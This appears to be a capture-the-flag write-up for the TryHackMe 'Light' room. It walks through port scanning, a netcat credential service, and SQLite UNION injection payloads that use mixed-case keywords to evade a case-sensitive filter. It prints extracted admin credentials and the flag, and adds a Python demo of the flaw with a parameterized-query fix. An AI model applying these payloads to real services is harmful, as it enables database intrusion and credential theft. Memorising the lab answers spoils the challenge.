Light

Reconnaissance

We start by setting an environment variable for the target IP to simplify command execution:

export TARGET_IP=10.10.13.202

Full Port Scan with Nmap

sudo nmap -p- -Pn --min-rate 5000 $TARGET_IP

Results:

Not shown: 65441 closed tcp ports (reset), 92 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste

We identified two open ports: 22 (SSH) and 1337 (unknown service).

Initial Access via Netcat

After detecting an open service on port 1337, we interact with it using Netcat:

nc $TARGET_IP 1337

Upon connecting, the service prompts for a username. A provided username (smokey) returns a password:

Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL

The service looks up the supplied username and returns the matching password, so if that lookup builds its query from the raw input, it is likely vulnerable to SQL injection.

SQL Injection Exploitation

Since the service returns data based on whatever username we enter, we attempt SQL injection through that field to extract further information.

Enumerating Tables

' uNion SeLeCt GrOuP_CoNcAt(name) From sqlite_master WhErE type='table' AnD 'a'='a

Explanation:

  • sqlite_master → Stores database metadata.
  • type='table' → Filters only table names.
  • GROUP_CONCAT(name) → Merges all table names into a single string.
  • Mixed-case keywords: the service blocks some SQL keywords (such as UNION and SELECT) with a case-sensitive filter, so alternating the case of each keyword gets past it while SQLite still parses them normally.

Discovered Tables:

usertable, admintable
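To show why the mixed-case payload works and what fixes it, here is an added Python example (not code from the room or from the writeup) with a constructed in-memory SQLite database holding the two tables found above; the keyword filter, the lookup logic and the placeholder credentials are assumptions, and the payload is the one used above.

```python
import sqlite3

# Constructed sample schema mirroring the two tables found in the writeup.
# The credential values are placeholders, not the room's real data.
SCHEMA = """
CREATE TABLE usertable (id INTEGER, username TEXT, password TEXT);
CREATE TABLE admintable (id INTEGER, username TEXT, password TEXT);
INSERT INTO usertable VALUES (1, 'smokey', 'user-password-placeholder');
INSERT INTO admintable VALUES (1, 'TryHackMeAdmin', 'admin-password-placeholder');
"""

# Hypothetical case-sensitive keyword blacklist, as the writeup implies.
BLOCKED = ("UNION", "SELECT")

# Table-enumeration payload from the writeup.
TABLE_PAYLOAD = (
    "' uNion SeLeCt GrOuP_CoNcAt(name) From sqlite_master "
    "WhErE type='table' AnD 'a'='a"
)


def connect():
    """Create the constructed in-memory database."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def lookup_vulnerable(db, username):
    """Blacklist plus string concatenation: the filter only matches
    upper-case keywords, and the input still ends up inside the SQL."""
    if any(word in username for word in BLOCKED):
        return None
    sql = f"SELECT password FROM usertable WHERE username = '{username}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def lookup_hardened(db, username):
    """Bound parameter: the input is data, never part of the statement."""
    row = db.execute(
        "SELECT password FROM usertable WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = connect()
    print(lookup_vulnerable(db, "smokey"))          # normal lookup works
    print(lookup_vulnerable(db, "UNION SELECT"))    # blocked by the filter
    print(lookup_vulnerable(db, TABLE_PAYLOAD))     # table names leak out
    print(lookup_hardened(db, TABLE_PAYLOAD))       # None: no such username
```

The vulnerable lookup returns `usertable,admintable` for the payload, while the parameterized version treats the whole string as a literal username and finds nothing; detection-wise, a username field that suddenly contains quotes or schema table names such as sqlite_master is worth alerting on.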

Extracting Column Names from admintable

' uNiOn SeLeCt GrOuP_CoNcAt(name) From pragma_table_info('admintable') WhErE 'a'='a

Explanation:

  • pragma_table_info('admintable') → Retrieves column names from admintable.
  • GROUP_CONCAT(name) → Concatenates all column names.

Columns Found:

id, username, password

Extracting Data from admintable

' uNiOn SeLeCt GrOuP_CoNcAt(id || ':' || username || ':' || password) From admintable WhErE 'a'='a

Extracted Credentials:

1:TryHackMeAdmin:mamZtAuMlrsEy5bp6q17
2:flag:THM{SQLit3_InJ3cTion_is_SimplE_nO?}